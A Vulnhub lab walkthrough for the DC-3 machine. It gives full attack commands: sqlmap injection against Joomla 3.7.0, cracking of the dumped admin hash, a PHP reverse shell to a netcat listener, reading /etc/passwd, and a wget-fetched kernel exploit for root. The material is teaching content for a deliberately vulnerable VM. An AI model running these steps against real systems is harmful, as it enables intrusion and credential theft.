Walkthrough #1
Vulnhub Write-Up: — DC: 3
Concepts Covered:
Discovery of Target IP (netdiscover)
Scanning of Target IP (nmap)
Manual examination of HTTP services
Database Enumeration (sqlmap)
John the ripper to crack hashes (john)
Joomla Admin Login
Injection of PHP reverse shell via Joomla (php-reverse-shell.php)
Setting up reverse connection with netcat listener (netcat)
Linux Privilege escalation via exploitation of kernel (exploit-db)
Target VM Information:
Target VM: DC_3
Date released: March, 26th 2019
Author: DCAU
Series: DC
Size: 1025 MB
Format: Virtual Machine (Virtualbox — OVA)
Difficulty: Beginnerish…
I’ll be using Kali Linux inside of virtual box as my local OS for this write-up. You’re results may look a bit different if you’re using a different OS to follow along! Make sure your network settings are correct, and lets get cracking!
Phase 1: Reconnaissance
If we were in a real-world scenario, this phase might require a lot more effort on our parts. All we need to do is find the IP address of the machine that we already know is sitting on our network. This can be done by using the netdiscover tool from the command line.
[Tip]: An easy way to figure out the range that you should scan is to run ‘ifconfig’ from your local machine(Kali for me).
Example:
The IP address of my Kali box is 10.0.2.4. The netmask of 255.255.255.0 tells me that the network portion of the IP is 10.0.2.x and also gives us the cidr address of /24. The -r option indicates we want to scan a -(r)ange of IP addresses.
Command Used: netdiscover -r 10.0.2.0/24
Result:
[tip]: We know we’re going to have to type out this IP address over and over again, so let’s make our lives easier by sticking it in a variable.
Command Used: export ip=10.0.2.35
Now we can access the address value with $ip .
Example:
Phase 2: Scanning
Now that we have our target IP address, we can move onto scanning the ports to see which are open, and what services are running on those ports.
Command Used: nmap -A -p- -v $ip
Option Breakdown:
- -A: Enable OS detection, version detection, script scanning, and traceroute
- -p-: Indicates we wish to scan all 65535 ports
- -v: Verbose output, this allows us to view the scan in real time
Results: Open Port(s) Discovered
Results II: Services running on open port(s)
Next, we’ll run nikto against the web-server to look for any potential vulnerabilities or interesting directories/files. The -h option below indicates the -(h)ost we are trying to scan.
Command Used: nikto -h http://$ip:80
Result:
Before we head over to the browser to check out the web-page running on port 80, lets run dirb against the port.
Command used: dirb http://$ip:80
Result:
At this point we know we have Joomla running as some sort of Open Source Content Management system on port 80. And from the looks of the past two results, it appears that we also have access to the Joomla administrator login page. It’s time to head over to Firefox to see what we can find on the website running on port 80.
Phase 3: Gaining Access
Firefox Browser: http://10.0.2.35/
We are greeted with the DC-3 homepage and a message from the admin:
According to our initial scan results, there is also a page at http://10.0.2.35/administrator, we head there next.
Firefox Browser: http://10.0.2.35/administrator
We now have a possible attack vector if we can gain administrator access to the Joomla Content Management System. Before we can think about getting in, we need to know what version of Joomla the server is running. I couldn’t find any relevant version information in the source html code, so we’ll be using metasploit to fish out the version.
Command(s) used:
- msfconsole -q (-q : open metasploit quietly)
2. search joomla
3. use 9
3a. show options
4. set RHOST 10.0.2.35
4a. exploit
Bingo! The server is running Joomla 3.7.0.
After doing a bit of research on this specific version of Joomla and any associated vulnerabilities, I came across this this interesting exploit at https://exploit-db.com/exploits/42033.
# Exploit Title: Joomla 3.7.0 — Sql Injection
# Date: 05–19–2017
# Exploit Author: Mateus Lino
# Reference: https://blog.sucuri.net/2017/05/sql-injection-vulnerability-joomla-3-7.html
# Vendor Homepage: https://www.joomla.org/
# Version: = 3.7.0 # Tested on: Win, Kali Linux x64, Ubuntu, Manjaro and Arch Linux
# CVE : — CVE-2017–8917 URL Vulnerable: http://localhost/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml%27
Using Sqlmap: sqlmap -u “http://localhost/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" — risk=3 — level=5 — random-agent — dbs -p list[fullordering]
Shout out to Mateus Lino for coming through with this find and documenting it for us! He even provides us with the sqlmap command we need to use! To verify that we do have SQL injection, lets enter everything after the index.php? in the above sqlmap command into the browser.
Firefox browser: http://10.0.2.35/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml%27
Result:
The error we receive indicates that the site is in fact vulnerable to SQL injection! Lets move onto sqlmap to see if we can gain access to the database.
Command Used: sqlmap -u “http://10.0.2.35/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]
Results(Part 1): Right away we see that the back-end may be mysql
Results(part 2): 3 injection points located and confirmation that the DBMS is mysql!
Results(Part 3): Ohhhhh Mama. Show me them DB’s!!!
Database Enumeration:
Idea: Lets start with the obvious joomladb. We need to find out what tables are located inside of this database. In the original sqlmap command we used the --dbs to get a list of the databases. Now that we know which database we want to plunder, we’ll replace --dbs with “-D joomladb --tables”. This command says go inside of the joomladb database, and show me the tables.
Command used: sqlmap -u “http://10.0.2.35/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb --tables -p list[fullordering]
Results: joomladb has 91 table entries, what were looking for is on the very bottom of the results.
Idea: We are going to be using the same approach we used when we were telling sqlmap which database we wanted access to. Now we know which table we’d like to see the columns for. We can replace --tables, with “-T ‘#__users’ --columns”. The command will now read, Go into joomladb, access the #__users table, and show me the columns of the table.
[Note]: Be sure to wrap #__users in quotes or sqlmap won’t be able to understand which table we want to access!
Command used: sqlmap -u “http://10.0.2.35/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb -T “#__users” --columns -p list[fullordering]
[Note]: When you are asked about if you want to use common existence check, type ‘y’.
Results: 6 columns inside of the #__users table
Idea: Now we know the names of the columns located inside of the #__users table, and I’m sure by now your starting to get the hang of how this database enumeration is happening. Lets remove --columns, and replace it with “-C username --dump” to dump the joomla admin username.
Command Used: sqlmap -u “http://10.0.2.35/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb -T “#__users” -C username --dump -p list[fullordering]
Results: Joomla Admin username (admin)
Now we can adjust the above command to dump the password hashes associated with this user. Remove -C username, and replace it with “-C password --dump”
Command used: sqlmap -u “http://10.0.2.35/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml"--risk=3 --level=5 --random-agent -D joomladb -T “#__users” -C password --dump -p list[fullordering]
Results: Joomla admin account password hash
And just like that, we have the username and password hash for the joomla administrator account!
admin:$2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu
Hash Cracking:
Before we can log into the account, we need to crack this password hash. The amount of time needed to crack the hash, will depend on how complex the password is, and what type of hashing algorithm was used to create the hash.
The first thing I like to do is save the hash to a file. For this write-up, I’ve saved the hash to a file called ‘john.hash’. Once we’ve got our hash saved inside of a file, we’ll toss it to john to see if it’s able to be cracked within a reasonable amount of time!
Command used: john --crack-status john.hash
WOW. This is a great example of why using a simple password is incredibly stupid. After executing the above command, john is able to crack the password in just over 0 seconds!
If your still with me at this point, congratulations! We now have the Joomla administrator login credentials: admin:snoopy
Lets login and see what sort of trouble we can cause with admin privileges!
Getting a Reverse Shell Via Joomla Admin Dashboard:
I’ve managed to pwn a few joomla web apps in my day, so lets see if the skills in my toolbox are still relevant with this system!
Idea: From here we’re looking for a way to gain remote access to the server via a reverse shell. Because we have admin access, we should have no problems creating a new page to hold our reverse shell. Once uploaded, all we need to do is set up a local listener using netcat, and navigate to the malicious page in the browser.
From the drop down menu, select Extensions -> Templates. Select one of the templates and you should see something like this:
Now click the ‘new file’ button on the top of the screen. From here enter a name for the new file we’d like to add to the site and make sure to select PHP as the file type. I’ve decided to name my file ‘shelly.php’. Hit save and you should now be presented with a blank text-editor window. Now that we have a place for our reverse-shell, lets grab one that comes pre installed from the Kali command line!
Command used: locate php-reverse-shell.php
Results:
Next, we need to copy that file into our current directory.
Command Used: cp /usr/share/webshells/php/php-reverse-shell.php ~/Pentests/DC_3
Open php-reverse-shell.php inside of your favorite editor and change the two lines marked with the comments: “// CHANGE THIS”. You should enter the IP of your attack machine, and a local listening port that is currently unused.
Example:
Save and close the file. All that we need to do now, is copy the contents of our reverse shell into the new page that we’ve created on the joomla admin dashboard.
We’ve now created a new page shelly.php, and added the contents of the php-reverse-shell.php. After we save this file, our reverse shell can be accessed by navigating to http://10.0.2.35/templates/protostar/shelly.php. But before we do this, we must setup a listener on the local port we added to the php-reverse-shell.php script. The port I used was 4444, so we’ll use netcat to listen in on that port.
Command Used: nc -nvlp 4444
Now from the browser, head over to http://10.0.2.35/templates/protostar/shelly.php.
If everything was successful, the browser should seem to hang, and you should be greeted with a much deserved shell sitting in the terminal where we left the nc listener running!!
We now have a shell on the box! Currently we’re logged in as user (www-data).
Phase 4: Privilege Escalation
Now that we are logged in, we must figure out some key bits of information to see if we can weasel our way into gaining root access to the machine.
First lets check the /etc/passwd file for all of the usernames
Command used: cat /etc/passwd
Results:
Now, lets check for anything interesting in the /home directory.
Command used: ls -Rhal /home/*
Results:
Next, we’ll check the architecture of the server with the following command.
Command used: cat /proc/version; uname -a; uname -mrs; rpm -q kernel; dmesg | grep Linux; ls /boot | grep vmlinuz-; file /bin/ls; cat /etc/lsb-release
Result:
I did a bit more digging and discovered the following exploit for this specific kernel and Linux distro.
Exploit: https://www.exploit-db.com/exploits/39772
Read through the exploit and try to understand how it functions. Once you have a decent understanding of how it works, we’re ready to wget it into the /tmp folder of our victim machine.
[note]: If you’re not in the /tmp directory you will not have the required permissions to save the incoming file! /tmp tends to be a world writable directory.
Exploit Proof of Concept:
user@host:~/ebpf_mapfd_doubleput$ ./compile.sh
user@host:~/ebpf_mapfd_doubleput$ ./doubleput
starting writev woohoo, got pointer reuse writev returned successfully.
if this worked, you’ll have a root shell in <=60 seconds.
suid file detected, launching rootshell… we have root privs now…
root@host:~/ebpf_mapfd_doubleput# id uid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare),999(vboxsf),1000(user)
Here’s what I did in order:
1.) cd /tmp
2.) wget https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip
3.) unzip 39772.zip
4.) cd 39772
6.) tar -xf exploit.tar
7.) cd ebpf_mapfd_doubleput_exploit
8.) ls
9.) At this point I was a bit worried. After executing the compile.sh script like it says in the proof of concept above, I got the following error:
10.) I eventually said screw it and just went ahead and executed the double put file and here is the results!
Phew! That error must not have been critical enough to stop the exploit from running it’s course. We now have complete control over the machine and can execute any code we like! Congrats if you were following along at home!
Lets check the /root folder for our flag file and call it a day!